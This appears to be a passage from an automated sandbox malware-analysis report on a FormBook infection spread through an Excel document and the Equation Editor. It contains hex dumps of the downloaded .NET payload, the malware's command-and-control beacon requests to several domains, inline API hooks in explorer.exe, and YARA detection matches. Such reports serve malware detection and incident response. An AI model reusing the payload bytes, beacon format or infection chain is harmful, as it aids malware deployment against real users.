1d 00 00 00 01 00 00 11 00 00 72 13 00 00 70 28 19 00 00 0a 26 00 de 0c 0a 00 06 6f 1a 00 00 0a 26 00 de 00 2a 00 00 00 01 10 00 00 00 00 01 00 0f 10 00 0c 19 00 00 01 6e 00 03 74 14 00 00 01 16 6f 1b 00 00 0a 00 02 7b 06 00 00 04 6f 18 00 00 0a 26 2a 2e 00 02 03 14 28 03 00 00 06 00 2a 7e 00 02 7b 06 00 00 04 6f 1c 00 00 0a 00 02 7b 06 00 00 04 6f 1d 00 00 0a 28 1e 00 00 0a 00 2a 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1f 00 00 0a 00 00 02 03 28 20 00 00 0a 00 2a 00 13 30 06 00 aa 06 00 00 03 00 00 11 00 02 73 21 00 00 0a 7d 01 00 00 04 d0 02 00 00 02 28 22 00 00 0a 73 23 00 00 0a 0a 02 73 24 00 00 0a 7d 02 00 00 04 02 73 25 00 00 0a 7d 09 00 00 04 02 73 25 00 00 0a 7d 06 00 00 04 02 02 7b 01 00 00 04 73 26 00 00 0a 7d 07 00 00 04 02 73 27 00 00 0a 7d 08 00 00 04 02 73 25 00 00 0a 7d 05 00 00 04 02 73 25 00 00 0a 7d 04 00 00 04 02 73 28 00 00 0a 7d 03 00 00 04 02 7b 02 00 00 04 6f 29 00 00 0a 00 02 7b 07 00 00 04 6f 29 00 00 0a 00 02 7b 03 00 00 04 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL4`0t @ @O H.texts t `.rsrcv@@.reloc\|@BH,[CO}(({rp~/(o{o&0rp(&o&nto{o&.(~{o{o(0+,{+,{o( 0s!}("s#s$}s%}s%}{s&}s'}s%}s%}s(}{o){o){
Feb 23, 2021 11:34:27.626698971 CET	5	IN	Data Raw: 6f 2a 00 00 0a 00 02 28 29 00 00 0a 00 02 7b 02 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 00 02 7b 02 00 00 04 6f 2b 00 00 0a 02 7b 06 00 00 04 6f 2c 00 00 0a 00 02 7b 02 00 00 04 6f 2b 00 00 0a 02 7b 05 00 00 04 6f 2c 00 00 0a 00 Data Ascii: o*(){o+{o,{o+{o,{o+{o,{o+{o,{o+{o,{s-o.{rGpo/{ @s0o1{o2{(3o4{o5{(
Feb 23, 2021 11:34:27.626710892 CET	6	IN	Data Raw: 7b 03 00 00 04 16 6f 4a 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 4b 00 00 0a 28 4c 00 00 0a 00 02 17 28 4d 00 00 0a 00 02 20 24 01 00 00 20 58 01 00 00 73 30 00 00 0a 28 4e 00 00 0a 00 02 28 2b 00 00 0a 02 7b 02 00 00 04 6f 2c 00 00 0a 00 Data Ascii: {oJ"@"PAsK(L(M $ Xs0(N(+{o,(Or%poPti(Q(R(Sr;p(/(T(Ur]po{oV{oV{oW(V*}((}
Feb 23, 2021 11:34:27.626724005 CET	7	IN	Data Raw: 00 0a 00 02 17 28 55 00 00 0a 00 02 72 c4 05 00 70 6f 17 00 00 0a 00 02 16 28 56 00 00 0a 00 02 28 6c 00 00 0a 00 2a 96 02 14 7d 10 00 00 04 02 28 15 00 00 0a 00 00 02 28 13 00 00 06 00 02 03 7d 0f 00 00 04 02 28 0f 00 00 06 00 2a 00 00 00 1b 30 Data Ascii: (Urpo(V(l}((}(0~{omon{oo+(p{omoq&(r-o{omos,{ot*)H06
Feb 23, 2021 11:34:27.626735926 CET	9	IN	Data Raw: 00 04 20 9c 00 00 00 1f 15 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 13 00 00 04 19 6f 32 00 00 0a 00 02 7b 14 00 00 04 17 6f 7b 00 00 0a 00 02 7b 14 00 00 04 6f 2b 00 00 0a 02 7b 1b 00 00 04 6f 2c 00 00 0a 00 02 7b 14 00 00 04 6f 2b 00 00 0a 02 7b Data Ascii: s0o1{o2{o{{o+{o,{o+{o,{o+{o,{o+{o,{o+{o,{o+{o,{o+{o,{o+{o,{o+{
Feb 23, 2021 11:34:27.626749992 CET	10	IN	Data Raw: 15 00 00 04 20 bd 00 00 00 1f 14 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 15 00 00 04 18 6f 32 00 00 0a 00 02 7b 15 00 00 04 72 38 08 00 70 6f 17 00 00 0a 00 02 7b 1e 00 00 04 20 b5 00 00 00 20 6a 01 00 00 73 2d 00 00 0a 6f 2e 00 00 0a 00 02 7b 1e Data Ascii: s0o1{o2{r8po{ js-o.{rnpo/{Ks0o1{o2{rpo{of{sAog"@"PAsK(L(M s0(N(+
Feb 23, 2021 11:34:27.626765966 CET	11	IN	Data Raw: 2d 00 00 0a 6f 2e 00 00 0a 00 02 7b 27 00 00 04 72 cb 09 00 70 6f 2f 00 00 0a 00 02 7b 27 00 00 04 1f 4b 1f 17 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 27 00 00 04 1a 6f 32 00 00 0a 00 02 7b 27 00 00 04 72 ef 09 00 70 6f 17 00 00 0a 00 02 7b 27 00 Data Ascii: -o.{'rpo/{'Ks0o1{'o2{'rpo{'of{'sAog{(- s-o.{(o{(rpo/{( -s0o1{(o2{(o"@"PAsK(L
Feb 23, 2021 11:34:27.626781940 CET	13	IN	Data Raw: 0a 06 72 6d 0a 00 70 6f 8b 00 00 0a 00 06 72 7d 0a 00 70 6f 8b 00 00 0a 00 06 72 8b 0a 00 70 6f 8b 00 00 0a 00 06 72 d3 0e 00 70 6f 8b 00 00 0a 00 06 72 e1 0e 00 70 6f 8b 00 00 0a 00 06 72 fd 0e 00 70 6f 8b 00 00 0a 00 06 72 09 0f 00 70 6f 8b 00 Data Ascii: rmpor}porporporporporporporporporpor1porGpor_poreporwporporporporpor
Feb 23, 2021 11:34:27.626797915 CET	14	IN	Data Raw: 00 00 00 00 00 de 08 26 00 73 93 00 00 0a 7a 2a 00 00 01 10 00 00 00 00 01 00 04 05 00 08 24 00 00 01 1b 30 01 00 0e 00 00 00 00 00 00 00 00 00 00 de 08 26 00 73 93 00 00 0a 7a 2a 00 00 01 10 00 00 00 00 01 00 04 05 00 08 24 00 00 01 1b 30 01 00 Data Ascii: &sz$0&sz$0&sz$0((*(+srps8B/+oo&X{T/o_
Feb 23, 2021 11:34:27.626813889 CET	15	IN	Data Raw: 00 04 11 15 17 59 94 05 7b 31 00 00 04 11 16 17 59 94 fe 01 2b 01 16 13 19 11 19 2d c6 0e 07 11 07 11 14 58 11 15 9e 11 05 2d 15 08 11 09 59 11 14 30 0d 11 14 08 11 09 58 fe 02 16 fe 01 2b 01 16 13 1a 11 1a 2c 44 00 0e 07 11 07 11 14 58 94 0e 06 Data Ascii: Y{1Y+-X-Y0X+,DXX,'X}WXY}X+@XX:X:rpsz*0+XX/
Feb 23, 2021 11:34:27.850655079 CET	17	IN	Data Raw: 70 28 5d 00 00 0a 26 00 2a 00 01 10 00 00 02 00 15 00 39 4e 00 15 00 00 00 00 13 30 03 00 86 00 00 00 16 00 00 11 00 72 69 13 00 70 02 7b 36 00 00 04 6f a8 00 00 0a 74 22 00 00 02 7b 32 01 00 04 6f a9 00 00 0a 0b 12 01 28 aa 00 00 0a 72 48 14 00 Data Ascii: p(]&9N0rip{6ot"{2o(rHp(r\p(,A{7rpo{6oZ((}3(2rp(]&{7{6oZo{8o`{9o`>{8o`

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49167	52.58.78.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:35:30.494999886 CET	731	OUT	GET /67d/?cDK=Q0JFvHbbV3aA7SwyaLinIDYx2yT6hkhQohmp5i+qhLfSEfFe3Vda4XF7USYP2N9+mGRMxQ==&PBR=dpddZ HTTP/1.1 Host: www.priority1fleet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 11:35:30.536180973 CET	731	IN	HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Tue, 23 Feb 2021 10:35:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 32 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 69 6f 72 69 74 79 31 66 6c 65 65 74 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 65 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 69 6f 72 69 74 79 31 66 6c 65 65 74 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>52 <meta http-equiv='refresh' content='5; url=http://www.priority1fleet.com/' />a </head>9 <body>3e You are being redirected to http://www.priority1fleet.coma </body>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49168	216.239.32.21	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:35:49.175415039 CET	732	OUT	GET /67d/?cDK=IAj2p4O1jtMDA38vgzfl4HFMdfHNof0Kad5Noufyf5YlrFTK7f2GvawlXOZGdPFW7uU/5g==&PBR=dpddZ HTTP/1.1 Host: www.quallateematerial.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 11:35:49.302113056 CET	733	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 x-ua-compatible: IE=edge Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 23 Feb 2021 10:35:49 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Resource-Policy: cross-origin Content-Security-Policy: script-src 'report-sample' 'nonce-v1blWgn1B9wwsQE1o2Yl/w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self' Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Set-Cookie: NID=209=CVMPOu86RQoRO1xX0qZpybi_865Jt8oaUkel-D7fK7_oizxz8Jp729Yf698MU3alVU1VF8f-TYzq_vB3PbX4Z05GyKV7p3xSPBNbJJn1t8xunaFcwSarv0fXEIwwV5ozI0SiAO8aOTqvfPYPvX_kq1hToO8r3dcEMQSKvToQs3k; expires=Wed, 25-Aug-2021 10:35:49 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Connection: close Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 76 31 62 6c 57 67 6e 31 42 39 77 77 73 51 45 31 6f 32 59 6c 2f 77 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/Locuseriness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="v1blWgn1B9wwsQE1o2Yl/w">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business
Feb 23, 2021 11:35:49.302167892 CET	735	IN	Data Raw: 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 2f 2a 22 2c 22 2f 70 6f 73 74 73 2f 6c 2f 3a 6c 69 73 74 69 6e 67 49 64 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 22 2c 22 2f 72 65 73 74 61 75 72 61 6e 74 73 2f 2a 22 2c 22 2f 77 65 62 73 Data Ascii: ","/local/business/","/posts/l/:listingId","/restaurants","/restaurants/","/website/_/","/website/demo","/website/demo/","/website/demo/"],"FdrFJe":"286213820283364650","Im6cmf":"/_/GeoMerchantPrestoSiteUi","LVIXXb":1,"LoQv7e":true,"MT7f9b
Feb 23, 2021 11:35:49.302207947 CET	736	IN	Data Raw: 38 35 49 64 5a 38 4c 69 6b 42 6d 32 4c 58 6b 45 48 52 4c 32 49 22 2c 22 72 74 51 43 78 63 22 3a 30 2c 22 72 76 4f 6c 46 64 22 3a 22 50 41 47 45 5f 53 4f 55 52 43 45 5f 55 4e 4b 4e 4f 57 4e 22 2c 22 74 48 77 62 32 22 3a 66 61 6c 73 65 2c 22 76 39 Data Ascii: 85IdZ8LikBm2LXkEHRL2I","rtQCxc":0,"rvOlFd":"PAGE_SOURCE_UNKNOWN","tHwb2":false,"v9NS6b":"12954503917100341","vVkaEb":"","vXmutd":"%.@.\"GB\",\"ZZ\",\"VBE0Jg\\u003d\\u003d\"]\n","w2btAe":"%.@.null,null,\"\",true,null,null,null,false]\n","zChJod
Feb 23, 2021 11:35:49.302248001 CET	738	IN	Data Raw: 74 79 6c 65 26 26 28 65 3d 65 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 63 29 2c 22 30 70 78 22 3d 3d 65 2e 68 65 69 67 68 74 7c 7c 22 30 70 78 22 3d 3d 65 2e 77 69 64 74 68 7c 7c 22 68 69 64 64 65 6e 22 3d 3d 65 2e 76 69 73 69 62 69 Data Ascii: tyle&&(e=e.getComputedStyle(c),"0px"==e.height\|\|"0px"==e.width\|\|"hidden"==e.visibility&&!g))return!1;if(!c.getBoundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.pageYOffset;if(0>g+e.height\|\|0>c+e.width\|\|0
Feb 23, 2021 11:35:49.302287102 CET	739	IN	Data Raw: 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 3a 30 3b 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a Data Ascii: nt-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;margin:0;text-size-adjust:100%}textarea{font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{border:none}#apps-debug-tracers{display:none}.oY
Feb 23, 2021 11:35:49.302339077 CET	740	IN	Data Raw: 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 70 78 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 7d 2e 77 37 57 49 47 62 20 2e 79 35 42 7a 33 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 77 37 57 49 47 62 20 2e 69 68 53 6a 77 66 7b 74 Data Ascii: ansform:translateY(-5px) rotate(-45deg)}.w7WIGb .y5Bz3{opacity:0}.w7WIGb .ihSjwf{transform:translateY(5px) rotate(45deg)}@keyframes quantumWizBoxInkSpread{0%{transform:translate(-50%,-50%) scale(.2)}to{transform:translate(-50%,-50%) scale(2.2)
Feb 23, 2021 11:35:49.302383900 CET	742	IN	Data Raw: 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 31 61 37 33 65 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 48 51 38 79 66 2c 2e 48 51 38 79 66 20 61 7b 63 6f 6c 6f 72 3a 23 31 61 37 33 65 38 7d 2e 55 78 75 62 55 2c 2e 55 78 75 62 55 20 61 7b 63 6f 6c Data Ascii: ed{background:#1a73e8;color:#fff}.HQ8yf,.HQ8yf a{color:#1a73e8}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:transparent}.O0WRkf.u3bW4e .ZFr60d{background-color:rgba(0,0,0,0.12)}.UxubU.u3bW
Feb 23, 2021 11:35:49.302427053 CET	743	IN	Data Raw: 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 2e 31 36 31 29 20 38 30 25 2c 72 67 62 61 28 32 36 2c 31 31 35 2c 32 33 32 2c 30 29 20 31 30 30 25 29 7d 2e 65 33 44 75 75 Data Ascii: ,rgba(26,115,232,0.161),rgba(26,115,232,0.161) 80%,rgba(26,115,232,0) 100%)}.e3Duub .Vwe4Vb{background-image:radial-gradient(circle farthest-side,rgba(255,255,255,0.322),rgba(255,255,255,0.322) 80%,rgba(255,255,255,0) 100%)}.UxubU .Vwe4Vb{back
Feb 23, 2021 11:35:49.302467108 CET	745	IN	Data Raw: 2e 30 2c 30 2e 32 2c 31 29 20 2c 6f 70 61 63 69 74 79 20 2e 30 35 73 20 6c 69 6e 65 61 72 2c 74 6f 70 20 2e 32 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 30 2c 30 2e 30 2c 30 2e 32 2c 31 29 7d 2e 4a 50 64 52 36 62 2e 6a 56 77 6d 4c 62 7b Data Ascii: .0,0.2,1) ,opacity .05s linear,top .2s cubic-bezier(0.0,0.0,0.2,1)}.JPdR6b.jVwmLb{max-height:56px;opacity:0}.JPdR6b.CAwICe{overflow:hidden}.JPdR6b.oXxKqf{transition:none}.z80M1{color:#222;cursor:pointer;display:block;outline:none;overflow:hidd
Feb 23, 2021 11:35:49.302508116 CET	746	IN	Data Raw: 6c 65 20 66 61 72 74 68 65 73 74 2d 73 69 64 65 2c 23 62 64 63 31 63 36 2c 23 62 64 63 31 63 36 20 38 30 25 2c 72 67 62 61 28 31 38 39 2c 31 39 33 2c 31 39 38 2c 30 29 20 31 30 30 25 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 Data Ascii: le farthest-side,#bdc1c6,#bdc1c6 80%,rgba(189,193,198,0) 100%);background-size:cover;opacity:1;top:0;left:0}.J0XlZe{color:inherit;line-height:40px;padding:0 6px 0 1em}.a9caSc{color:inherit;direction:ltr;padding:0 6px 0 1em}.kCtYwe{border-top:1
Feb 23, 2021 11:35:49.343543053 CET	747	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 35 29 20 74 72 61 6e 73 6c 61 74 65 58 28 31 30 30 25 29 7d 7d 2e 46 4b 46 36 6d 63 2c 2e 46 4b 46 36 6d 63 3a 66 6f 63 75 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6f 75 74 6c 69 6e 65 3a 6e Data Ascii: ransform:scaleX(5) translateX(100%)}}.FKF6mc,.FKF6mc:focus{display:block;outline:none;text-decoration:none}.FKF6mc:visited{fill:inherit;stroke:inherit}.U26fgb.u3bW4e{outline:1px solid transparent}.C0oVfc{line-height:20px;min-width:88px}.C0oVfc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49169	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 11:36:09.678211927 CET	852	OUT	GET /67d/?cDK=W2Z2UcqSFcwA3YJY0Xi1zX0akAe1ObC272eZaT9vn/sHgfwkHiKnNOLEeBBq/HqgrL2ZGA==&PBR=dpddZ HTTP/1.1 Host: www.hattonpalacejewellery.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 11:36:09.818981886 CET	853	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 10:36:09 GMT Content-Type: text/html Content-Length: 275 ETag: "6031584e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xE6
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xE6
GetMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xE6
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xE6

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 928 Parent PID: 584

General

Start time:	11:33:40
Start date:	23/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f420000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1960 Parent PID: 584

General

Start time:	11:34:00
Start date:	23/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2300 Parent PID: 1960

General

Start time:	11:34:04
Start date:	23/02/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xd30000
File size:	687616 bytes
MD5 hash:	2201881C6CC2DE12C71F906E43178EF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2608 Parent PID: 2300

General

Start time:	11:34:14
Start date:	23/02/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xd30000
File size:	687616 bytes
MD5 hash:	2201881C6CC2DE12C71F906E43178EF9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1388 Parent PID: 2608

General

Start time:	11:34:16
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: raserver.exe PID: 2332 Parent PID: 1388

General

Start time:	11:34:27
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\raserver.exe
Imagebase:	0xa30000
File size:	101888 bytes
MD5 hash:	0842FB9AC27460E2B0107F6B3A872FD5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 